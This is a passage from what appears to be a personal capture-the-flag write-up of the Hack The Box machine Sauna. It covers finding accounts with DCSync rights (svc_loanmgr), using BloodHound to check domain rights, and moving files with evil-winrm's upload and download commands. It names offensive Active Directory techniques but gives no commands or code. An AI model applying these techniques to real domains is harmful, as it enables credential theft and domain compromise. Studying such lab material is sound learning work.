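On a real domain the interesting finding is any SID in this output that is not a built-in admin group or a domain controller; on Sauna that is svc_loanmgr's SID (RID 1108).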

Alternatively, BloodHound shows the current account's rights in the domain, including whether it can DCSync.

On uploading and downloading

I only learned this from IppSec's video: after logging in with evil-winrm, you can upload and download files directly with the upload and download commands. Huh, so convenient, learned something new -_-!